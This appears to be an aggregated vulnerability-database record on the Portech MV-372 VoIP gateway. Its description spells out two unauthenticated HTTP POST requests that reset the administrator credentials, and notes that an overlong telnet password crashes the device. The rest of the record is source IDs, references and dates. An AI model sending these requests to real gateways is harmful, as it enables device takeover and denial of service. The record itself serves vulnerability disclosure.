ID

VAR-190001-1025


TITLE

Portech MV-372 VoIP Gateway Multiple Security Vulnerabilities

Trust: 0.9

sources: BID: 48560 // CNNVD: CNNVD-201107-076

DESCRIPTION

Portech MV-372 has a WEB management verification bypass vulnerability. An attacker submits a malicious POST request without having to verify the username and password of the changed device: POST http://<device address>/change.cgi HTTP/1.1Host: <device address >User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 5.0) Gecko/20100101Firefox/5.0Accept: text/html, application/xhtml+xml, application/xml; q=0.9,*/*;q= 0.8Accept-Language: hu-hu, hu; q=0.8, en-us; q=0.5, en; q=0.3Accept-Encoding: gzip, deflateAccept-Charset: ISO-8859-2, utf-8; q= 0.7,*;q=0.7Connection: keep-aliveReferer: http://192.168.0.100/change.htmContent-Type: application/x-www-form-urlencodedContent-Length: 50Nuser=admin&Npass=admin&Nrpass=admin&submit=Submit to save These username and password changes can be submitted as follows: POST http://<device address>/save.cgiHost: <device address>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 5.0) Gecko/20100101Firefox /5.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5 ,en;q=0.3Accept-E Ncoding: gzip, deflateAccept-Charset: ISO-8859-2, utf-8; q=0.7, *; q=0.7Connection: keep-aliveReferer: http://192.168.0.100/save.htmContent-Type: application/x -www-form-urlencodedContent-Length: 11submit=Save. Portech MV-372 is a VoIP network management device. The Portech MV-372 Telnet service has a remote denial of service vulnerability. Providing a very long password such as 5000 characters can cause the telnet service to crash. You need to restart the device for normal functions. The Portech MV-372 VoIP Gateway is prone to multiple security vulnerabilities. An attacker may leverage these issues to obtain potentially sensitive information, cause vulnerable devices to crash (resulting in a denial-of-service condition), or bypass certain security restrictions by sending a specially crafted HTTP POST request

Trust: 1.35

sources: CNVD: CNVD-2011-2554 // CNVD: CNVD-2011-2552 // BID: 48560

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 1.2

sources: CNVD: CNVD-2011-2554 // CNVD: CNVD-2011-2552

AFFECTED PRODUCTS

vendor:portechmodel:mv-372scope:eqversion:0

Trust: 1.5

sources: CNVD: CNVD-2011-2554 // CNVD: CNVD-2011-2552 // BID: 48560

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201107-076

TYPE

Unknown

Trust: 0.3

sources: BID: 48560

EXTERNAL IDS

db:BIDid:48560

Trust: 2.1

db:CNVDid:CNVD-2011-2554

Trust: 0.6

db:CNVDid:CNVD-2011-2552

Trust: 0.6

db:CNNVDid:CNNVD-201107-076

Trust: 0.6

sources: CNVD: CNVD-2011-2554 // CNVD: CNVD-2011-2552 // BID: 48560 // CNNVD: CNNVD-201107-076

REFERENCES

url:http://seclists.org/fulldisclosure/2011/jul/26

Trust: 1.2

url:http://www.securityfocus.com/bid/48560

Trust: 0.6

url:http://www.portech.com.tw/p3-product1_1.asp?pid=14

Trust: 0.3

sources: CNVD: CNVD-2011-2554 // CNVD: CNVD-2011-2552 // BID: 48560 // CNNVD: CNNVD-201107-076

CREDITS

Zsolt Imre

Trust: 0.9

sources: BID: 48560 // CNNVD: CNNVD-201107-076

SOURCES

db:CNVDid:CNVD-2011-2554
db:CNVDid:CNVD-2011-2552
db:BIDid:48560
db:CNNVDid:CNNVD-201107-076

LAST UPDATE DATE

2022-05-17T02:09:35.519000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2011-2554date:2011-07-06T00:00:00
db:CNVDid:CNVD-2011-2552date:2011-07-06T00:00:00
db:BIDid:48560date:2011-07-05T00:00:00
db:CNNVDid:CNNVD-201107-076date:2011-07-07T00:00:00

SOURCES RELEASE DATE

db:CNVDid:CNVD-2011-2554date:2011-07-06T00:00:00
db:CNVDid:CNVD-2011-2552date:2011-07-06T00:00:00
db:BIDid:48560date:2011-07-05T00:00:00
db:CNNVDid:CNNVD-201107-076date:1900-01-01T00:00:00